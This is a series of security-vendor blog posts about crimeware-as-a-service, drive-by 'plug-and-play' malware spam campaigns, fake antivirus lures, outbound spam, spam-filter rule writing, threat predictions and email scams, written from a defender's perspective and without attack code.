As malware has evolved and cloud computing has become the latest social and business platform, scammers and cybercriminals have moved away from developing malware for notoriety sake to building online cybercrime services that are designed to support the needs of other cybercriminals, as well as attract new recruits and affiliates. Rather than going through all the effort of developing, hosting and deploying the malware, the criminals are developing toolkits that allow others to perpetuate the crimes, further hiding their operations from detection by law enforcement. Essentially, everything that a criminal would need for cybercrime is now available for purchase.

So what has changed the last couple of years to make CaaS an even bigger threat?

The biggest thing that has changed is that technology has improved, allowing criminals to be more targeted with their threats. As we have seen in the last 6-8 months, traditional email filtering solutions and anti-virus engines are having trouble stopping the sophisticated campaigns that look and feel like big brand messages and contain content that read like legitimate emails.  We have seen the emergence of plug-and-play (PNP) malware, which requires only a single click for malware to infect a computer. We have monitored multiple variations of this type of malware, each using a variety of techniques to target users and slip through corporate security systems undetected.

Plug-and-play is one of many delivery vehicles used by cybercriminals to distribute malware. The PNP architecture is a game changer because criminals can simply chain on exploits as they become available without needing to modify their spam campaigns in any way. Examples of malware and exploits that we have stopped include signature-distinct executables, Windows Help Center vulnerability, obfuscated JavaScript, PDF vulnerabilities and fake A/V tools and Adobe executables.

We have also seen compromised accounts on eBay and other big brands acting as sources for malware and for zombies to acquire spam templates used in malware campaigns. As was mentioned in an earlier post, the styles of the new wave of threats are “far too varied, detailed and idiomatic to have been generated by spammers.” In other words, the people and or tools perpetuating the malware campaigns are more sophisticated than we have seen in the past.

With the toolkits available and the infrastructure in place, these types of attacks are likely to increase in volume and complexity. Going forward, CaaS providers will continue to provide updates to their toolkits, providing users with increasingly more advanced techniques for compromising computers and networks and new ways to monitor their effectiveness. The CaaS business is not unlike traditional software providers, and the motivation is not unlike a traditional business. Money is driving the commercialization of new CaaS techniques and technologies. As a result, development of the toolkits and online services will continue in an effort to improve performance for the cybercriminals.

As ugly a picture as this presents, companies can protect themselves by taking a more aggressive approach to email security. Relying on end users to serve as a filter and giving them the ability to establish their own personal filtering policies weakens any existing security infrastructure as a whole.  Security needs to be dynamic and must be able to react quickly to changes in user behavior and the evolving threat landscape. While CaaS may be the next big thing, even today, it doesn’t necessarily have to impact your business. The big question is, “Will it?”

Just how active are the scammers? In the first three weeks of August, we are approaching a new record in virus rule creation; a record that was originally set two years ago in August 2008. With several days left in the month, the record is definitely not safe.

The plug-and-play malware campaigns continue to spoof popular brands, including Amazon, eBay, Newegg, Digg, Facebook, Amazon.com, WordPress and Xerox. Scammers are also making their messages more sophisticated while also being more targeted with their campaigns. As we have seen, cyber-criminals have taken great care in creating a look and feel that is consistent with emails that people receive from the host of brands they use on a regular basis. They are also starting to use emails and tactics that spoof lesser known organizations such as an NPR.org newsletter confirmation.

The major new point of interest for these campaigns is the use of what is suspected to be the scraping of emails (essentially emails stolen from the hard-drives of people who have been infected). These are selected in such a manner that they trick the recipient into clicking on a link or an attachment.

I have become fairly astute at identifying a phishing scam, malware threat and other spam simply by looking at it. I have a pretty good grasp of the kinds of language that can be expected from spammer-constructed messages, but these new waves of messages are nowhere near what are commonly found. The style is far too varied, detailed and idiomatic to have been generated by spammers.

Compromised Multiply.com Account

This site is one that we identified in a press release as a possible source for zombies to acquire spam templates used in these malware campaigns. It is still one of a few sources that contains this kind of content online, and unfortunately, the compromised blog pages are still active.

The examples are a combination of service generated notification emails, as well as person-to-person emails that are being used as spam templates. All of them reference a link or attachment in some natural way.

This newer technique is not being used in lieu of traditional old-school techniques such as bogus news headlines. The distribution of the malware is accomplished either through links with drive-by-downloads (PNP), obfuscated JavaScript attached as HTML (essentially the PNP without the link), and direct executable attachment. All three forms take turns and have overlapped to some extent with new campaigns throughout the past few weeks. Most of the PNP sites I’ve looked into have still been redirecting to the FakeAV sites, but there may be others, as there are a few variants going around.

I strongly believe that there is a deep connection among exploit kits, malware/crimeware-as-a-service, the PNP campaigns that we have been writing about and this recent explosion of malicious email. It is clear that the criminal underground doesn’t seem to have been impacted by the recession, and their ability to pump out malware is steadily increasing.

One last thing… an article speculated recently that this wave of malware could be attributed to the Rock Phish gang that was widely reported as having produced two-thirds of all phishing activity for the second half of 2009. This makes a lot of sense and was also something we considered early on due to the way they spoofed brands; among other similarities. It also makes sense that phishing would begin to trend down as malware trends up. As long as malware can be reliably implanted, gaining credentials through phishing becomes a second-class crime.

While I’m not predicting the end of phishing, scammers are probably asking themselves, “Why bother?”… Especially since compromising hosts nets them everything they could have gotten from phishing and a whole lot more.

Screenshot 1

In previous incarnations of these Plug-and-Play malware campaigns, the browser would be redirected to a “Canadian Pharmacy” or similar site after the exploit suite had been given a chance to execute. A couple weeks ago, the campaigns began redirecting the browser directly to a downloadable .exe (Windows executable file). This week, the drop-site that scammers are redirecting to is a decent looking spoof of a Windows XP Explorer window that uses attention getting graphics and animation to trick users into believing their computer is infected. (See screenshot 1)

Fake AV is more commonly encountered in malware laden search results, a poisoning usually attributed to black hat search engine optimization. Black hat SEO is an umbrella term used to describe various activities related to elevating malicious and other shady websites in search engine results. Fake AV is also commonly encountered on machines that have already been compromised by malware. In these cases, victims are coaxed into paying a fee to cyber criminals in order to “remove” the malware from their system. Fake AV represents yet another incremental step for criminals in finding ways to profit from computers turned zombies.

The drive-by component in this recent wave of brand-spoofing campaigns is using the newer exploit set that targets the Windows Help and Support Center and a few older exploits. We described this newer exploit suite a few weeks ago here: http://www.redcondor.com/blog/?p=298.

Screenshot 2

The redirect component of the campaign shunts the browser to the Windows XP Explorer window spoof and is intended to trick victims into believing that their anti-virus engine has detected “system errors” and is currently scanning their system “to prevent data lost”. While the bogus scanning activity is ongoing, a “Hardware and security errors detected” section indicates ominous errors and that “Spyware has stolen your personal information.”. This landing page is well crafted in terms of graphics (language is another matter) and is quite likely to fool less technically savvy folks. Thich adds considerably to the virulent nature of this threat.

After a few seconds of bogus scanning activity, a couple pop-ups are presented to the user. (See Screenshot 2)Humorously, the title of the first of these windows is “Contraviro Warning.” A quick search identifies Contraviro as a known fake AV malware that has been circulating for several years. Another quick search for one of the “found” viruses turns up similar results: http://www.2-spyware.com/remove-trojan-im-win32-faker-a.html

Screenshot 3

The second dialog box is modal and requires that the user click one of two buttons before control can be returned to any browser window. The pop-up entices the user to click on “OK” to “Start downloading CRITICAL security software update”. If the user complies, the browser downloads a windows executable, which evidently is hosted under various names; in this case antivirus_24.exe. (24 happened to be the affiliate ID used in the redirection URL which tends to indicate that this may be a pay-per-install campaign).

Here is the permalink to the scan results for the antivirus_24.exe file (only 8 out of 42, or 19% of AV engines detected the malware sample as dangerous): http://www.virustotal.com/analisis/dbac0281507987694f6217d655396bb7503bb4ebd2d1d140615e84b5c979171d-1281134394

After downloading the executable, another pop-up handily instructs the user how to run the software. (See screenshot 3) Judging by the hits on Virus Total, this is very likely a Trojan. If the exploit suite hadn’t already compromised the machine, it is certainly compromised now, and in all probability remotely controllable. Moreover, as the fake warnings presciently indicate, private data (e.g. login credentials, etc.) are likely in the process of being stolen.

Screenshot 4

Finally, attempts to close the browser window that started all this trouble or to navigate to another page will fail. Attempting to do so pops up another modal dialogue box, and both choices simply put control back to the malicious page. (See Screenshot 4) The browser process has to be killed to get out of the loop, but most users will probably just restart their computer. Unfortunately, doing so provides a convenient mechanism for the malware to burrow deeply into the file system.

Outbound mail is another animal, and easily overlooked by many organizations –until it bites. All it takes is a single virus outbreak on your network or compromised email account. Even a few hours of worth of spam egress can add up to days or weeks of damage control for smaller organizations.

If your early warning system consists of a sudden influx of abuse reports, or discovery of an abnormal number of destination mail servers suddenly rejecting your mail, you’ll soon find yourself engaged in the unpleasant task of de-listing your MTAs from a litany of independently controlled blacklists, each with different and sometimes complex removal requirements. Adding insult to the injury of your now tarnished reputation are the headaches and confusion users suffer when their mail is unexpectedly delayed or outright discarded.

But before you can even begin to unknot the problems caused by an outbound spam leak, you first need to identify the source of the breach. This is not often an easy or a straightforward process. Should another wave of spam emanate from your infrastructure, many blacklist operators will be less forgiving the second time around.

Hijacking Methods Abound

There are many ways spammers can hijack an organization to perform their dirty work. For example, targeted attacks like spear phishing, commonly directed at universities, ISPs and ESPs can net a surprisingly high response rate. This gives spammers a foothold into the network where they can then authenticate as legitimate users.

Other methods involve compromised machines infected with Trojans and in some cases, spam can be sent unchecked through corporate borders simply because the traffic originates from a workstation turned zombie inside the DMZ.

Naive Assumptions About Inbound Solutions

The outbound spam problem differs considerably from inbound spam. But many people, IT staff included, are unaware of the challenges of stopping outbound spam even if they are well versed in techniques that prevent inbound spam. A common, yet naïve assumption that simply reversing an inbound solution will suffice for filtering the outbound stream can quickly lead to unhappy users; the problem is not symmetric.

Look at it this way: For inbound mail, almost every connection made to your filter is a spammer, but for outbound, almost every connection is legitimate. This asymmetry is an important observation because many of the assumptions about inbound mail filtering don’t apply to outbound filtering.

In fact, gray listing (in-session defenses), IP/sender reputation (RBLs, black/white lists), and knowledge of valid recipients are the primary front-line defenses utilized by nearly all inbound spam filters. Yet these make less sense and are less effective, and can even cause problems for legitimate mail when applied to the outbound stream.

Not being able to rely on these mainstay techniques to remove the bulk of outbound spam requires fresh thinking on how to distinguish good messages from bad. What is needed is behavioral modeling, accurate content filtering and sensible application of throttling mechanisms, and a healthy dose of security awareness.

Frustrating Game of Whack-a-Mole

Deliverability is always a concern for spammers, and so is the overhead incurred from blasting out their messages. ISPs are a great target because their reputation can be hijacked, resulting in less delays and increased success in message acceptance at the destination. ISPs with poor outbound protection are also much less likely to even notice an outbound spam problem until the damage is already done.

As for SMEs and universities, they often don’t have the staff required to ensure their systems are secure, or to track down the source of a breach once it has occurred. The task of identifying compromised accounts can become a frustrating game of whack-a-mole while the scammers are busy leveraging the institution’s computational horse-power and bandwidth for their own ends.

Is rule-writing a science or an art?

Both. The science involves text processing and analysis at a minimum, but can get fairly elaborate with machine learning and statistical methods to aid in expert analysis – particularly useful in exposing invariant components of what would appear to the uninitiated as a mind-numbing degree of randomization in spam campaigns.

And the art?

The art comes with years of hands-on experience, and learning to balance the many constraints spam reviewers must keep in mind. For example, we need to ensure that our rules are fast and efficient, block spam and never ham (good mail), and don’t target trivial aspects of a campaign that are unstable and likely to change during a campaign run or over longer time intervals as the spammers continue to randomize their approach. The rules need to be general so that we’re not writing them in a one-to-one ratio with spam samples, but not so general that they end up matching unanticipated features of legitimate email. And we need to make the rules as fast as possible in response to real-time events.

Describe the rule-writing process–from detection of a new campaign to creating and activating the rule to block it.

The cycle looks something like this: A novel campaign emerges that seeps through our defenses, and we begin obtaining samples immediately. The samples are analyzed by our 24/7/365 review staff, who then describe features of the campaign to our filter stack, which is then updated within seconds to all deployed gateway security devices. This causes the samples from the new campaign to cease arriving in the reviewers’ queue as the breach has been dealt with. Rinse, repeat.

Are junk mail and spam rules different?

Yes. One of the complexities of using a spam filter is that I have a notion of what spam is, but my neighbor’s definition is likely different. There simply is no satisfactory definition for spam that covers everyone who uses email. Some people consider spam to be anything that they receive that they didn’t want. Others may view any email that has some sort of advertisement as spam, even if they have purchased items from the company in the past and specifically opted in to receive discounts and what not. Because Red Condor doesn’t model its filters at an individual mailbox granularity we have to make some compromises and Junk rules are part of how we accomplish this. Our notion of spam is meant to drive at the heart of an almost universal commonality in perspective of what spam is: spam either explicitly uses deceptive tactics to make its way past filters, or has content that is intended to deceive or harm the recipient in some way.

According to your bio, your favorite rules are “simple gems.”  What do you mean by this?

Occasionally we detect annoyance campaigns, usually associated with probing activity where there is no sensible payload to the spam. These can be completely randomized with very little to “bite on”. This makes describing the campaigns more difficult (essentially tantamount to describing patterns in the decimal expansion of pi), which can result in rather convoluted looking rules where several features have to be present for a match to take place. To me, these are just ugly beasts when compared to say a simple eight-byte string that has blocked millions of spam over several years without generating any false positives.

How do you measure a rule’s worth?

Well, one standard would simply be the number of hits that it acquires over its lifetime. However there is complexity here, too, related to volume. Just because a rule targets the lower volume campaigns doesn’t mean it’s worth less than a rule that targets high-volume spam. It’s just where the rule lies in the distribution. We have to have rules that cover all scales or else customers will receive spam.

A better measure of worth is the false-positive rate. It’s not uncommon for us to discard rules that generate just two or three false positives, even when they have blocked millions of spam, but we have very strict standards and take reports of false positives very seriously; we always strive to do better.

Less than 24 hours after issuing a warning of new variations and tactics being used in the one-click, plug-and-play malware campaign that we have been monitoring the past several months, we blocked a number of new messages that spoofed Amazon, ImageShack and Gawab. All of the messages used the plug-n-play malware distribution architecture.

Interestingly, Friday’s messages reverted back to using the older exploit set that has been in use for the past couple months.

There is a new twist in these messages however… The scammers are using this opportunity to perform the drive-by download as usual, but instead of using the redirection page to drop you on a Canadian Pharmacy site, the redirection instructs the browser to download an .exe (adobe_flash_install.exe), which as of this morning, was not detected by any AV engines.

Below is the VT analysis of this malware:

http://www.virustotal.com/analisis/53b687184961fbc9799509347608a5bbddb092b46f78f271c072b72d628df8b8-1279910999

Also, just in case the browser refresh directive doesn’t work, the redirect page when loaded just looks like a blank page with a single image loaded:

http://www.thecoca-colacompany.com/images/noflash_singlevideo.gif

(The above link is safe to view. The spammers are using a legitimate image hosted on Coca-Cola’s website.)

Clicking on the image on the redirect page will also download the malicious .exe.

All this is in addition to the usual litany of exploits typically employed by these campaigns; they are using a couple different versions this time. None of these variations are detected by more than a handful of AV engines. The malicious payloads include a couple of signature-distinct executables, which most likely are two instances of the same Trojan that has simply been mutated:

http://www.virustotal.com/analisis/fe6bf009c6e3085d0f41e14022a2b5729a0c3cc7622c81c7234ab21b0d07dc9d-1279912776

http://www.virustotal.com/analisis/d6af1138118bba51c20fa74a1a6fc560f84e98d4cb3830c1a37d14a7b4d70b37-1279909339

Additionally there is the usual, freshly mutated PDF exploit:

http://www.virustotal.com/analisis/2a56e56ea197fdbf77ee7fe77125bc67a5c89474dcc99bc0789000956c198788-1279912917

And of course there are the other exploits that usually accompany these campaigns, but they do not appear to have changed much.

One of the emails in the campaign had this subject line: “Unauthorized ACH Transaction.” The email warns recipients that an unauthorized ACH transaction was recently initiated from their bank account, but it was rejected by the “Electronic Payments Association.” The user is then invited to click on an embedded link to review the transaction report. The single-click could infect users’computers with a Trojan virus.

We also noticed other campaigns today that were using this technique, but spoofing Xerox WorkCentre messages which are used to send scanned documents as attachments over email.

The one-click malware spammers finally switched out one of the older exploits they had been using (CVE-2006-0003) for months. This exploit was replaced with another more recent one– the Windows Help Center vulnerability (CVE 2010-1885). This exploit was reported in early June, and Microsoft recently issued a patch. For the first time that I am aware of, this particular vulnerability is being exploited in combination with yet another vulnerability CVE-2010-2265 that allows cross-site scripting (XSS), thereby classifying this spam attack as a blended threat and ultimately achieving remote code execution.

It appears that the code used in this attack was copied verbatim from public exploit repositories that collect such threats for research purposes. It’s worth noting that the previous exploits from this campaign also used proof-of-concept code virtually unchanged from public sources.

Game-changing, plug-and-play attacks

Here is an example of the newly introduced code being used in this attack:

https://www.metasploit.com/redmine/projects/framework/repository/revisions/9495/diff/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb

I’ve been writing about this new trend in one-click malware <http://www.redcondor.com/blog/?p=258> for months now.  Recently, I had an epiphany.

Essentially the spammers have constructed an efficient malware distribution framework where they can use their “normal” spam campaigns in double-duty mode. This allows an efficient search of Internet-connected hosts to find and exploit vulnerable machines.

This activity is transparent to the normal function of their spam campaigns. In other words, they can spamvertize any website as usual, but now have the added bonus of piggybacking these campaigns with modular attacks that can be updated by criminals at any time and with little effort.

For this reason I have started referring to this technique as a “plug-n-play” architecture because they can simply chain on exploits as they become available without needing to modify their spam campaigns in any way. They can use this technique in any spam campaign that uses a URL based call-to-action. This is a game changer.

Spammers ironing out the kinks

Despite their sophistication, it appears that the spammers are still trying to iron out some kinks. One of the samples that we blocked earlier in the day had a broken call-to-action URL, and in another sample that I analyzed, the redirect page was broken too. The redirect requests the browser to navigate to the malware distribution site instead of the usual Canadian Pharmacy (or similar) drop-site. This may indicate that there is some type of kit that is behind this recent wave and some spammers haven’t quite figured out how to use it effectively.

These campaigns occurred almost simultaneously with several other variants, all using the same “ACH” and Xerox templates. But instead of using the redirection URL that is the earmark of this plug-n-play exploit framework, they instead used a direct link to a windows executable (.exe). Additionally, another variant was observed that embedded the malicious executable within an archive attached directly to the spam. These more direct and traditional methods of infection occurring along side the plug-n-play variant suggests that the scammers are testing which delivery method is more successful.

A final note: The executables being used in the campaign appear to be Zbot/Bredo variants–“banking” Trojans that Red Condor has reported on in past security alerts.

1. Criminals will increasingly leverage opportunities to commit corporate and/or political espionage and intellectual property theft.

With hundreds of millions of infected machines connected to the Internet, there is much potential for dedicated adversaries to seek access to zombies in specific organizations as preliminary steps in sophisticated targeted attacks. Several such events have been reported recently. As bot-herders awaken to the vast potential that their compromised machines represent — both in terms of local information as well as footholds into private networks — these information warfare attacks will ramp up considerably.

Right now, I presume the major impediment to these activities is simply in connecting the supply to the demand and vice-versa. As the information age underground economy continues to expand and mature, these activities have the potential to spread like wildfire.

2. More refined systems for the monetization of private information.

Count on a rise in the number of ransom demands by criminals in exchange for stolen information. The case of the encrypted hard drive is only the beginning.

It won’t be long before criminals figure out what they can really do with all that information–perhaps starting as a fallback if they’re unable to sell a particular resource.

In a similar vein, it is likely that blackmailing could become another significant emerging threat. However the target of these blackmailing attempts won’t be limited to execs and political figures, but will include all Internet users. I see it as a simple attack that could be easily mounted in a manner similar to the way “lost wallet” scams are sent to the address book of recently compromised web-mail accounts.

3. An explosion of plug-and-play malware distribution.

The development of phishing and malware kits led to a threat explosion due to a lower bar to entry and ease of reproduction. A similar trend seems to be occurring, with modular plug-and-play malware distribution methods that can be easily and transparently inserted into any spam campaign. This effectively turns any spam campaign into an efficient search method for finding and exploiting vulnerable hosts.

In the past, malware-based spam campaigns were of a single intent — to install malware on as many systems as possible–and perpetrated by bot-herders to increase the size of their flock. Individually crafted, these campaigns take advantage of some specific new exploit or to leverage popular news items and holidays.

Now it appears that a new strategy is forming where any spam campaign can simply “plug in” a malware component. The stealthy drive-by techniques that enable it are general purpose, so the malware distribution infrastructure can be re-used in future campaigns without difficulty. The exploits can even be updated in real-time as new vulnerabilities are found. I expect this technique to become a permanent feature of many future spam campaigns.

4. Increased use of novel attack vectors.

Only recently has the average netizen become aware of the many potential risks associated with the use of social networking sites. These services represent new ways for attackers to interface with their victims as well as perform reconnaissance for targeted extended attacks and exploit the implicit trust you have in your “friends” by impersonating them. And as technologically advanced tools like smart-phones, smart-cars and other “smart” things pervade our lives I expect that we will see completely novel exploits that will catch many people off guard.

We might begin to see increased attacks on personal area networks that seek to exploit Bluetooth communications, or fingerprinting individuals based on signatures that can be formed from the signals emitted by the myriad devices we are constantly carrying; or social engineering attacks used to gain access to vehicles with remotely accessible door locks.

The ways in which technology intersects our everyday lives will fall under increased scrutiny by criminals seeking to take advantage of subtle, overlooked vulnerabilities that can stack up with disastrous consequences. Even now, with the mainstream adoption of online banking, many people still don’t understand the importance of securing their wireless home networks.

5. A significant increase in spam and scams perpetrated via VoIP and other communication protocols.

The fundamental properties of SMTP that led to the massive proliferation of spam are: cheap electronic message transmission and openness in communication endpoints (anyone can message anyone else).

VoIP systems also have these properties and as VoIP continues to proliferate, become more integrated, cheaper to access and utilize, along with several other enabling components (such as cheap bandwidth, text-to-speech, speech-to-text and translation systems), I expect that information age criminals will branch out more fully into this medium. Already there have been several reports of “vishing” attacks carried out by scammers, and I would expect these attacks to increase in volume and sophistication.

I expect new and creative attacks carried out through other systems sharing these properties but with better call-to-action potential like instant messaging, micro-blogging, etc. Obviously these have and are all being abused by spammers and their ilk. But they have not yet been exploited to anywhere near the degree seen in email. As various enabling factors continue to emerge I expect the same perverse inversion in the ratio of legitimate to illegitimate traffic to occur in VoIP and other protocols over the long-term.

In a recent report by the Ponemon Institute, of the 83 percent of executives who reported their companies had been victims of an advanced threat, nearly half reported a theft of confidential information or intellectual property. That’s a hefty number of occurrences.  And yet, for all the money corporations spend on physical security—cameras in the lobby, ID badges, and biometrics and body scanners—digital “property” remains vulnerable to attack.

Secure access to the corporate network should expand beyond the username and password paradigm into new paradigms for protection such as biometrics and digital keys. Users need to be better educated about the dangers of phishing emails, especially in this era of sophisticated attacks that spoof trusted brands such as Adobe, eBay and AT&T.

Aside from an effective anti-spam filter, the strongest defense against phishing attacks is safe user behavior, stringent policies and training procedures, and technologies that support email security solutions. To this end, Red Condor recommends the following:

• Strong corporate policies reinforced with regular in-person security briefings and education opportunities
• Isolated internal networks, accessible from protected terminals, for storing valuable intellectual property – anything connected to the Internet can be stolen.
• Stronger passwords – Establish passphrases instead of passwords. Most people use the same passwords or variations of the same passwords for multiple accounts, which makes it easy for cybercriminals to piece together identities.
• Cyber security should be treated with the same level of importance as physical security; deploy personal authentication devices, including biometrics and digital keys for all of your users.

Financial institutions should take the lead in security–given the level of sensitivity of the data they protect and issues with customer liability when corporate accounts are compromised.  The Experi-Metal (EMI) and Comerica Bank suit provides an example of the real costs of phishing. The case involves an EMI employee unwittingly responding to a phishing email that ultimately allowed scammers to transfer half a million dollars from EMI’s corporate bank account to accounts around the world. EMI is now suing Comerica for the losses.

Cases like this one, with more sure to follow, indicate that corporations and their executives have yet to grasp the size and scope of the phishing problem. Only new security products that complement email security solutions and continually update user policies and education programs will suffice. For these changes to occur, executives need to heed the wake-up call.

Before the Internet, con artists marked their victims through snail mail and fax and earnest conversations in parking lots and on street corners. (Ever run into the “stranded motorist” with the empty gas can, asking to borrow $15 and promising to pay it back if you give him your address?)

Then the Internet came along. The con hit its stride and never looked back. Today’s email scams range from the believable to the bizarre.

Pure-bred Yorkshire terrier pups at bargain prices, vacation rentals in exotic locales. Mystery shopper, sales rep for obscure animal vaccine distributors, and other jobs crafted for the growing ranks of the unemployed. Lotto scams that appear to come from trusted domains. Emails of tragic accounts of adult children of murdered West Africa freedom fighters who need help investing their inheritance in a “good U.S. company.”

Why do advance-fee scams work? And who is dumb enough to fall for them?

The human factor in the success of the online con is huge. We want a deal; we want love and romance; we want a job; and we want to help our fellows. The victims are you and I and the guy in the next cube.

And while it may seem inconceivable that anyone would fall for the traditional 419 scam, for example, I suspect many of these victims don’t speak English as a first language and may not recognize the typical odd syntax and misspelled words in these messages.

Preying on the Lonely and the Paranoid

For lonely hearts, there’s the foreign girlfriend scam.  From the comfort of computer terminals in Russia and Eastern Europe, scammers string along victims, enticing them with attractive photos of their bride-to-be and affectionate messages with instructions for mailing funds to cover the cost of getting the girlfriend out of the country.  These “relationships” go on sometimes for months until the victim goes broke, gets wise, or both.

There’s a special place in hell for perpetrators of death threat scams—email messages from bogus hit men demanding $15K in exchange for not killing you.  To well-adjusted people, the messages seem patently ridiculous– although they make for a chilling read. But if you happen to be mentally unstable or to have a particularly nasty enemy, you could consider paying up.

Gaming the filters

Technology helps in the fight against these scams. But traditional anti-spam filters are only so reliable. While most spam attacks are sent by automated bots, manually written 419 emails are usually sent via legitimate email servers and webmail account to fool filters and users. And scammers have gotten good at circumventing Bayesian-based filters. They write the message, blast it out, and wait. If the message bounces, they modify a word or phrase and try again. Eventually the message gets through, unless human monitors are there to analyze and block it.

Sometimes the victims are people who should know better. Recently, a colleague at Red Condor almost fell for one on craigslist. An interested “buyer” emailed him about a desk he’d list in the classifieds. He was eager to complete the transaction and sent my colleague a check for $1,445 to cover the $250 desk, plus shipping across the country and an extra $100 for his trouble.  He was to deposit the $1,445 check (which the bank confirmed was bogus), pocket $350 and wire the remaining $1,095 to a (fake) shipping company.

Had my colleague gone the distance, he would’ve been out $1,095, plus bank fees for the bounced check. The appeal to people’s desire for a good deal and the time crunch element are common traits in scams like this one.

Law enforcement officials tend to view these cons as isolated cases, and are loathe to cough up the resources needed to investigate and prosecute the scammers. So advance-fee scams persist with little or no variation in delivery vectors. What scammers lack in technological ingenuity they make up for in persistence and creativity.

User beware: There’s a scam out there for you.